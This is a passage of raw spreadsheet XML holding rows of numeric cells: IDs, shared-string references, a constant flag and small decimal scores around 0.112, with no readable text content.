      <c r="B18088" s="2">
        <v>1.4402219E7</v>
      </c>
      <c r="C18088" s="2" t="s">
        <v>17439</v>
      </c>
      <c r="D18088" s="2">
        <v>1.0</v>
      </c>
      <c r="E18088" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18088" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18089" ht="15.75" customHeight="1">
      <c r="A18089" s="1">
        <v>25865.0</v>
      </c>
      <c r="B18089" s="2">
        <v>1.4891616E7</v>
      </c>
      <c r="C18089" s="2" t="s">
        <v>17440</v>
      </c>
      <c r="D18089" s="2">
        <v>1.0</v>
      </c>
      <c r="E18089" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18089" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18090" ht="15.75" customHeight="1">
      <c r="A18090" s="1">
        <v>26137.0</v>
      </c>
      <c r="B18090" s="2">
        <v>1.6031238E7</v>
      </c>
      <c r="C18090" s="2" t="s">
        <v>17441</v>
      </c>
      <c r="D18090" s="2">
        <v>1.0</v>
      </c>
      <c r="E18090" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18090" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18091" ht="15.75" customHeight="1">
      <c r="A18091" s="1">
        <v>26262.0</v>
      </c>
      <c r="B18091" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C18091" s="2" t="s">
        <v>17442</v>
      </c>
      <c r="D18091" s="2">
        <v>1.0</v>
      </c>
      <c r="E18091" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18091" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18092" ht="15.75" customHeight="1">
      <c r="A18092" s="1">
        <v>26264.0</v>
      </c>
      <c r="B18092" s="2">
        <v>1.6377141E7</v>
      </c>
      <c r="C18092" s="2" t="s">
        <v>17443</v>
      </c>
      <c r="D18092" s="2">
        <v>1.0</v>
      </c>
      <c r="E18092" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18092" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18093" ht="15.75" customHeight="1">
      <c r="A18093" s="1">
        <v>26295.0</v>
      </c>
      <c r="B18093" s="2">
        <v>1.6515666E7</v>
      </c>
      <c r="C18093" s="2" t="s">
        <v>17444</v>
      </c>
      <c r="D18093" s="2">
        <v>1.0</v>
      </c>
      <c r="E18093" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18093" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18094" ht="15.75" customHeight="1">
      <c r="A18094" s="1">
        <v>26484.0</v>
      </c>
      <c r="B18094" s="2">
        <v>1.7495398E7</v>
      </c>
      <c r="C18094" s="2" t="s">
        <v>17445</v>
      </c>
      <c r="D18094" s="2">
        <v>1.0</v>
      </c>
      <c r="E18094" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18094" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18095" ht="15.75" customHeight="1">
      <c r="A18095" s="1">
        <v>26539.0</v>
      </c>
      <c r="B18095" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C18095" s="2" t="s">
        <v>17446</v>
      </c>
      <c r="D18095" s="2">
        <v>1.0</v>
      </c>
      <c r="E18095" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18095" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18096" ht="15.75" customHeight="1">
      <c r="A18096" s="1">
        <v>26736.0</v>
      </c>
      <c r="B18096" s="2">
        <v>1.827826E7</v>
      </c>
      <c r="C18096" s="2" t="s">
        <v>17447</v>
      </c>
      <c r="D18096" s="2">
        <v>1.0</v>
      </c>
      <c r="E18096" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18096" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18097" ht="15.75" customHeight="1">
      <c r="A18097" s="1">
        <v>26959.0</v>
      </c>
      <c r="B18097" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C18097" s="2" t="s">
        <v>17448</v>
      </c>
      <c r="D18097" s="2">
        <v>1.0</v>
      </c>
      <c r="E18097" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18097" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18098" ht="15.75" customHeight="1">
      <c r="A18098" s="1">
        <v>26965.0</v>
      </c>
      <c r="B18098" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C18098" s="2" t="s">
        <v>17449</v>
      </c>
      <c r="D18098" s="2">
        <v>1.0</v>
      </c>
      <c r="E18098" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18098" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18099" ht="15.75" customHeight="1">
      <c r="A18099" s="1">
        <v>27354.0</v>
      </c>
      <c r="B18099" s="2">
        <v>2.1574111E7</v>
      </c>
      <c r="C18099" s="2" t="s">
        <v>17450</v>
      </c>
      <c r="D18099" s="2">
        <v>1.0</v>
      </c>
      <c r="E18099" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18099" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18100" ht="15.75" customHeight="1">
      <c r="A18100" s="1">
        <v>27570.0</v>
      </c>
      <c r="B18100" s="2">
        <v>2.2434626E7</v>
      </c>
      <c r="C18100" s="2" t="s">
        <v>17127</v>
      </c>
      <c r="D18100" s="2">
        <v>1.0</v>
      </c>
      <c r="E18100" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18100" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18101" ht="15.75" customHeight="1">
      <c r="A18101" s="1">
        <v>27601.0</v>
      </c>
      <c r="B18101" s="2">
        <v>2.2615689E7</v>
      </c>
      <c r="C18101" s="2" t="s">
        <v>17451</v>
      </c>
      <c r="D18101" s="2">
        <v>1.0</v>
      </c>
      <c r="E18101" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18101" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18102" ht="15.75" customHeight="1">
      <c r="A18102" s="1">
        <v>27617.0</v>
      </c>
      <c r="B18102" s="2">
        <v>2.2686181E7</v>
      </c>
      <c r="C18102" s="2" t="s">
        <v>17452</v>
      </c>
      <c r="D18102" s="2">
        <v>1.0</v>
      </c>
      <c r="E18102" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18102" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18103" ht="15.75" customHeight="1">
      <c r="A18103" s="1">
        <v>27793.0</v>
      </c>
      <c r="B18103" s="2">
        <v>2.315078E7</v>
      </c>
      <c r="C18103" s="2" t="s">
        <v>17453</v>
      </c>
      <c r="D18103" s="2">
        <v>1.0</v>
      </c>
      <c r="E18103" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18103" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18104" ht="15.75" customHeight="1">
      <c r="A18104" s="1">
        <v>27878.0</v>
      </c>
      <c r="B18104" s="2">
        <v>2.3552086E7</v>
      </c>
      <c r="C18104" s="2" t="s">
        <v>17301</v>
      </c>
      <c r="D18104" s="2">
        <v>1.0</v>
      </c>
      <c r="E18104" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18104" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18105" ht="15.75" customHeight="1">
      <c r="A18105" s="1">
        <v>27972.0</v>
      </c>
      <c r="B18105" s="2">
        <v>2.3995613E7</v>
      </c>
      <c r="C18105" s="2" t="s">
        <v>17454</v>
      </c>
      <c r="D18105" s="2">
        <v>1.0</v>
      </c>
      <c r="E18105" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18105" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18106" ht="15.75" customHeight="1">
      <c r="A18106" s="1">
        <v>28501.0</v>
      </c>
      <c r="B18106" s="2">
        <v>2.6703041E7</v>
      </c>
      <c r="C18106" s="2" t="s">
        <v>17455</v>
      </c>
      <c r="D18106" s="2">
        <v>1.0</v>
      </c>
      <c r="E18106" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18106" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18107" ht="15.75" customHeight="1">
      <c r="A18107" s="1">
        <v>28912.0</v>
      </c>
      <c r="B18107" s="2">
        <v>2.9444261E7</v>
      </c>
      <c r="C18107" s="2" t="s">
        <v>17456</v>
      </c>
      <c r="D18107" s="2">
        <v>1.0</v>
      </c>
      <c r="E18107" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18107" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18108" ht="15.75" customHeight="1">
      <c r="A18108" s="1">
        <v>30046.0</v>
      </c>
      <c r="B18108" s="2">
        <v>3.6237903E7</v>
      </c>
      <c r="C18108" s="2" t="s">
        <v>17457</v>
      </c>
      <c r="D18108" s="2">
        <v>1.0</v>
      </c>
      <c r="E18108" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18108" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18109" ht="15.75" customHeight="1">
      <c r="A18109" s="1">
        <v>30049.0</v>
      </c>
      <c r="B18109" s="2">
        <v>3624979.0</v>
      </c>
      <c r="C18109" s="2" t="s">
        <v>17458</v>
      </c>
      <c r="D18109" s="2">
        <v>1.0</v>
      </c>
      <c r="E18109" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18109" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18110" ht="15.75" customHeight="1">
      <c r="A18110" s="1">
        <v>30120.0</v>
      </c>
      <c r="B18110" s="2">
        <v>3.6880585E7</v>
      </c>
      <c r="C18110" s="2" t="s">
        <v>17459</v>
      </c>
      <c r="D18110" s="2">
        <v>1.0</v>
      </c>
      <c r="E18110" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18110" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18111" ht="15.75" customHeight="1">
      <c r="A18111" s="1">
        <v>30302.0</v>
      </c>
      <c r="B18111" s="2">
        <v>3.7919521E7</v>
      </c>
      <c r="C18111" s="2" t="s">
        <v>17460</v>
      </c>
      <c r="D18111" s="2">
        <v>1.0</v>
      </c>
      <c r="E18111" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18111" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18112" ht="15.75" customHeight="1">
      <c r="A18112" s="1">
        <v>30978.0</v>
      </c>
      <c r="B18112" s="2">
        <v>4.7524183E7</v>
      </c>
      <c r="C18112" s="2" t="s">
        <v>17461</v>
      </c>
      <c r="D18112" s="2">
        <v>1.0</v>
      </c>
      <c r="E18112" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18112" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18113" ht="15.75" customHeight="1">
      <c r="A18113" s="1">
        <v>30996.0</v>
      </c>
      <c r="B18113" s="2">
        <v>4.7602007E7</v>
      </c>
      <c r="C18113" s="2" t="s">
        <v>17462</v>
      </c>
      <c r="D18113" s="2">
        <v>1.0</v>
      </c>
      <c r="E18113" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18113" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18114" ht="15.75" customHeight="1">
      <c r="A18114" s="1">
        <v>31092.0</v>
      </c>
      <c r="B18114" s="2">
        <v>4.8462528E7</v>
      </c>
      <c r="C18114" s="2" t="s">
        <v>17463</v>
      </c>
      <c r="D18114" s="2">
        <v>1.0</v>
      </c>
      <c r="E18114" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18114" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18115" ht="15.75" customHeight="1">
      <c r="A18115" s="1">
        <v>31143.0</v>
      </c>
      <c r="B18115" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C18115" s="2" t="s">
        <v>17464</v>
      </c>
      <c r="D18115" s="2">
        <v>1.0</v>
      </c>
      <c r="E18115" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18115" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18116" ht="15.75" customHeight="1">
      <c r="A18116" s="1">
        <v>31729.0</v>
      </c>
      <c r="B18116" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C18116" s="2" t="s">
        <v>17465</v>
      </c>
      <c r="D18116" s="2">
        <v>1.0</v>
      </c>
      <c r="E18116" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18116" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18117" ht="15.75" customHeight="1">
      <c r="A18117" s="1">
        <v>31731.0</v>
      </c>
      <c r="B18117" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C18117" s="2" t="s">
        <v>17466</v>
      </c>
      <c r="D18117" s="2">
        <v>1.0</v>
      </c>
      <c r="E18117" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18117" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18118" ht="15.75" customHeight="1">
      <c r="A18118" s="1">
        <v>31786.0</v>
      </c>
      <c r="B18118" s="2">
        <v>5.2327867E7</v>
      </c>
      <c r="C18118" s="2" t="s">
        <v>17467</v>
      </c>
      <c r="D18118" s="2">
        <v>1.0</v>
      </c>
      <c r="E18118" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18118" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18119" ht="15.75" customHeight="1">
      <c r="A18119" s="1">
        <v>32643.0</v>
      </c>
      <c r="B18119" s="2">
        <v>5857973.0</v>
      </c>
      <c r="C18119" s="2" t="s">
        <v>17468</v>
      </c>
      <c r="D18119" s="2">
        <v>1.0</v>
      </c>
      <c r="E18119" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18119" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18120" ht="15.75" customHeight="1">
      <c r="A18120" s="1">
        <v>32645.0</v>
      </c>
      <c r="B18120" s="2">
        <v>5858087.0</v>
      </c>
      <c r="C18120" s="2" t="s">
        <v>17469</v>
      </c>
      <c r="D18120" s="2">
        <v>1.0</v>
      </c>
      <c r="E18120" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18120" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18121" ht="15.75" customHeight="1">
      <c r="A18121" s="1">
        <v>32669.0</v>
      </c>
      <c r="B18121" s="2">
        <v>5932492.0</v>
      </c>
      <c r="C18121" s="2" t="s">
        <v>17470</v>
      </c>
      <c r="D18121" s="2">
        <v>1.0</v>
      </c>
      <c r="E18121" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18121" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18122" ht="15.75" customHeight="1">
      <c r="A18122" s="1">
        <v>32912.0</v>
      </c>
      <c r="B18122" s="2">
        <v>6409446.0</v>
      </c>
      <c r="C18122" s="2" t="s">
        <v>17471</v>
      </c>
      <c r="D18122" s="2">
        <v>1.0</v>
      </c>
      <c r="E18122" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18122" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18123" ht="15.75" customHeight="1">
      <c r="A18123" s="1">
        <v>32980.0</v>
      </c>
      <c r="B18123" s="2">
        <v>6590423.0</v>
      </c>
      <c r="C18123" s="2" t="s">
        <v>17472</v>
      </c>
      <c r="D18123" s="2">
        <v>1.0</v>
      </c>
      <c r="E18123" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18123" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18124" ht="15.75" customHeight="1">
      <c r="A18124" s="1">
        <v>33105.0</v>
      </c>
      <c r="B18124" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C18124" s="2" t="s">
        <v>17473</v>
      </c>
      <c r="D18124" s="2">
        <v>1.0</v>
      </c>
      <c r="E18124" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18124" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18125" ht="15.75" customHeight="1">
      <c r="A18125" s="1">
        <v>33304.0</v>
      </c>
      <c r="B18125" s="2">
        <v>7492839.0</v>
      </c>
      <c r="C18125" s="2" t="s">
        <v>17474</v>
      </c>
      <c r="D18125" s="2">
        <v>1.0</v>
      </c>
      <c r="E18125" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18125" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18126" ht="15.75" customHeight="1">
      <c r="A18126" s="1">
        <v>33482.0</v>
      </c>
      <c r="B18126" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C18126" s="2" t="s">
        <v>17475</v>
      </c>
      <c r="D18126" s="2">
        <v>1.0</v>
      </c>
      <c r="E18126" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18126" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18127" ht="15.75" customHeight="1">
      <c r="A18127" s="1">
        <v>33514.0</v>
      </c>
      <c r="B18127" s="2">
        <v>8080533.0</v>
      </c>
      <c r="C18127" s="2" t="s">
        <v>17476</v>
      </c>
      <c r="D18127" s="2">
        <v>1.0</v>
      </c>
      <c r="E18127" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18127" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18128" ht="15.75" customHeight="1">
      <c r="A18128" s="1">
        <v>33584.0</v>
      </c>
      <c r="B18128" s="2">
        <v>8311613.0</v>
      </c>
      <c r="C18128" s="2" t="s">
        <v>17477</v>
      </c>
      <c r="D18128" s="2">
        <v>1.0</v>
      </c>
      <c r="E18128" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18128" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18129" ht="15.75" customHeight="1">
      <c r="A18129" s="1">
        <v>33907.0</v>
      </c>
      <c r="B18129" s="2">
        <v>9221568.0</v>
      </c>
      <c r="C18129" s="2" t="s">
        <v>17453</v>
      </c>
      <c r="D18129" s="2">
        <v>1.0</v>
      </c>
      <c r="E18129" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18129" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18130" ht="15.75" customHeight="1">
      <c r="A18130" s="1">
        <v>33952.0</v>
      </c>
      <c r="B18130" s="2">
        <v>9301161.0</v>
      </c>
      <c r="C18130" s="2" t="s">
        <v>17478</v>
      </c>
      <c r="D18130" s="2">
        <v>1.0</v>
      </c>
      <c r="E18130" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18130" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18131" ht="15.75" customHeight="1">
      <c r="A18131" s="1">
        <v>33980.0</v>
      </c>
      <c r="B18131" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C18131" s="2" t="s">
        <v>17479</v>
      </c>
      <c r="D18131" s="2">
        <v>1.0</v>
      </c>
      <c r="E18131" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18131" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18132" ht="15.75" customHeight="1">
      <c r="A18132" s="1">
        <v>33996.0</v>
      </c>
      <c r="B18132" s="2">
        <v>9450303.0</v>
      </c>
      <c r="C18132" s="2" t="s">
        <v>17480</v>
      </c>
      <c r="D18132" s="2">
        <v>1.0</v>
      </c>
      <c r="E18132" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18132" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18133" ht="15.75" customHeight="1">
      <c r="A18133" s="1">
        <v>7411.0</v>
      </c>
      <c r="B18133" s="2">
        <v>5.112461E7</v>
      </c>
      <c r="C18133" s="2" t="s">
        <v>17481</v>
      </c>
      <c r="D18133" s="2">
        <v>1.0</v>
      </c>
      <c r="E18133" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18133" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="18134" ht="15.75" customHeight="1">
      <c r="A18134" s="1">
        <v>20528.0</v>
      </c>
      <c r="B18134" s="2">
        <v>1.3172004E7</v>
      </c>
      <c r="C18134" s="2" t="s">
        <v>17482</v>
      </c>
      <c r="D18134" s="2">
        <v>1.0</v>
      </c>
      <c r="E18134" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18134" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="18135" ht="15.75" customHeight="1">
      <c r="A18135" s="1">
        <v>21126.0</v>
      </c>
      <c r="B18135" s="2">
        <v>1.8373382E7</v>
      </c>
      <c r="C18135" s="2" t="s">
        <v>17483</v>
      </c>
      <c r="D18135" s="2">
        <v>1.0</v>
      </c>
      <c r="E18135" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18135" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="18136" ht="15.75" customHeight="1">
      <c r="A18136" s="1">
        <v>25238.0</v>
      </c>
      <c r="B18136" s="2">
        <v>1.3379736E7</v>
      </c>
      <c r="C18136" s="2" t="s">
        <v>17484</v>
      </c>
      <c r="D18136" s="2">
        <v>1.0</v>
      </c>
      <c r="E18136" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18136" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="18137" ht="15.75" customHeight="1">
      <c r="A18137" s="1">
        <v>26001.0</v>
      </c>
      <c r="B18137" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C18137" s="2" t="s">
        <v>17485</v>
      </c>
      <c r="D18137" s="2">
        <v>1.0</v>
      </c>
      <c r="E18137" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18137" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="18138" ht="15.75" customHeight="1">
      <c r="A18138" s="1">
        <v>29620.0</v>
      </c>
      <c r="B18138" s="2">
        <v>3.3652412E7</v>
      </c>
      <c r="C18138" s="2" t="s">
        <v>17486</v>
      </c>
      <c r="D18138" s="2">
        <v>1.0</v>
      </c>
      <c r="E18138" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18138" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="18139" ht="15.75" customHeight="1">
      <c r="A18139" s="1">
        <v>600.0</v>
      </c>
      <c r="B18139" s="2">
        <v>1.9261286E7</v>
      </c>
      <c r="C18139" s="2" t="s">
        <v>17487</v>
      </c>
      <c r="D18139" s="2">
        <v>1.0</v>
      </c>
      <c r="E18139" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18139" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="18140" ht="15.75" customHeight="1">
      <c r="A18140" s="1">
        <v>11741.0</v>
      </c>
      <c r="B18140" s="2">
        <v>2.405194E7</v>
      </c>
      <c r="C18140" s="2" t="s">
        <v>17488</v>
      </c>
      <c r="D18140" s="2">
        <v>1.0</v>
      </c>
      <c r="E18140" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18140" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="18141" ht="15.75" customHeight="1">
      <c r="A18141" s="1">
        <v>11808.0</v>
      </c>
      <c r="B18141" s="2">
        <v>2.4460991E7</v>
      </c>
      <c r="C18141" s="2" t="s">
        <v>17489</v>
      </c>
      <c r="D18141" s="2">
        <v>1.0</v>
      </c>
      <c r="E18141" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18141" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="18142" ht="15.75" customHeight="1">
      <c r="A18142" s="1">
        <v>25275.0</v>
      </c>
      <c r="B18142" s="2">
        <v>1.339492E7</v>
      </c>
      <c r="C18142" s="2" t="s">
        <v>17490</v>
      </c>
      <c r="D18142" s="2">
        <v>1.0</v>
      </c>
      <c r="E18142" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18142" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="18143" ht="15.75" customHeight="1">
      <c r="A18143" s="1">
        <v>25451.0</v>
      </c>
      <c r="B18143" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C18143" s="2" t="s">
        <v>17491</v>
      </c>
      <c r="D18143" s="2">
        <v>1.0</v>
      </c>
      <c r="E18143" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18143" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="18144" ht="15.75" customHeight="1">
      <c r="A18144" s="1">
        <v>25551.0</v>
      </c>
      <c r="B18144" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C18144" s="2" t="s">
        <v>17492</v>
      </c>
      <c r="D18144" s="2">
        <v>1.0</v>
      </c>
      <c r="E18144" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18144" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="18145" ht="15.75" customHeight="1">
      <c r="A18145" s="1">
        <v>28566.0</v>
      </c>
      <c r="B18145" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C18145" s="2" t="s">
        <v>17493</v>
      </c>
      <c r="D18145" s="2">
        <v>1.0</v>
      </c>
      <c r="E18145" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18145" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="18146" ht="15.75" customHeight="1">
      <c r="A18146" s="1">
        <v>23651.0</v>
      </c>
      <c r="B18146" s="2">
        <v>6777960.0</v>
      </c>
      <c r="C18146" s="2" t="s">
        <v>17494</v>
      </c>
      <c r="D18146" s="2">
        <v>1.0</v>
      </c>
      <c r="E18146" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18146" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="18147" ht="15.75" customHeight="1">
      <c r="A18147" s="1">
        <v>18509.0</v>
      </c>
      <c r="B18147" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C18147" s="2" t="s">
        <v>17495</v>
      </c>
      <c r="D18147" s="2">
        <v>1.0</v>
      </c>
      <c r="E18147" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18147" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="18148" ht="15.75" customHeight="1">
      <c r="A18148" s="1">
        <v>772.0</v>
      </c>
      <c r="B18148" s="2">
        <v>2.1072114E7</v>
      </c>
      <c r="C18148" s="2" t="s">
        <v>17496</v>
      </c>
      <c r="D18148" s="2">
        <v>1.0</v>
      </c>
      <c r="E18148" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18148" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="18149" ht="15.75" customHeight="1">
      <c r="A18149" s="1">
        <v>5037.0</v>
      </c>
      <c r="B18149" s="2">
        <v>4.4278391E7</v>
      </c>
      <c r="C18149" s="2" t="s">
        <v>17497</v>
      </c>
      <c r="D18149" s="2">
        <v>1.0</v>
      </c>
      <c r="E18149" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18149" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="18150" ht="15.75" customHeight="1">
      <c r="A18150" s="1">
        <v>18641.0</v>
      </c>
      <c r="B18150" s="2">
        <v>5.3415227E7</v>
      </c>
      <c r="C18150" s="2" t="s">
        <v>17498</v>
      </c>
      <c r="D18150" s="2">
        <v>1.0</v>
      </c>
      <c r="E18150" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18150" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="18151" ht="15.75" customHeight="1">
      <c r="A18151" s="1">
        <v>22177.0</v>
      </c>
      <c r="B18151" s="2">
        <v>3.1683774E7</v>
      </c>
      <c r="C18151" s="2" t="s">
        <v>16935</v>
      </c>
      <c r="D18151" s="2">
        <v>1.0</v>
      </c>
      <c r="E18151" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18151" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="18152" ht="15.75" customHeight="1">
      <c r="A18152" s="1">
        <v>27684.0</v>
      </c>
      <c r="B18152" s="2">
        <v>2.2972405E7</v>
      </c>
      <c r="C18152" s="2" t="s">
        <v>17499</v>
      </c>
      <c r="D18152" s="2">
        <v>1.0</v>
      </c>
      <c r="E18152" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18152" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="18153" ht="15.75" customHeight="1">
      <c r="A18153" s="1">
        <v>28441.0</v>
      </c>
      <c r="B18153" s="2">
        <v>2.6516283E7</v>
      </c>
      <c r="C18153" s="2" t="s">
        <v>17500</v>
      </c>
      <c r="D18153" s="2">
        <v>1.0</v>
      </c>
      <c r="E18153" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18153" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="18154" ht="15.75" customHeight="1">
      <c r="A18154" s="1">
        <v>31106.0</v>
      </c>
      <c r="B18154" s="2">
        <v>4.8619169E7</v>
      </c>
      <c r="C18154" s="2" t="s">
        <v>17501</v>
      </c>
      <c r="D18154" s="2">
        <v>1.0</v>
      </c>
      <c r="E18154" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18154" s="2">
        <v>0.1120218579234973</v>
      </c>
    </row>
    <row r="18155" ht="15.75" customHeight="1">
      <c r="A18155" s="1">
        <v>32644.0</v>
      </c>
      <c r="B18155" s="2">
        <v>5858087.0</v>
      </c>
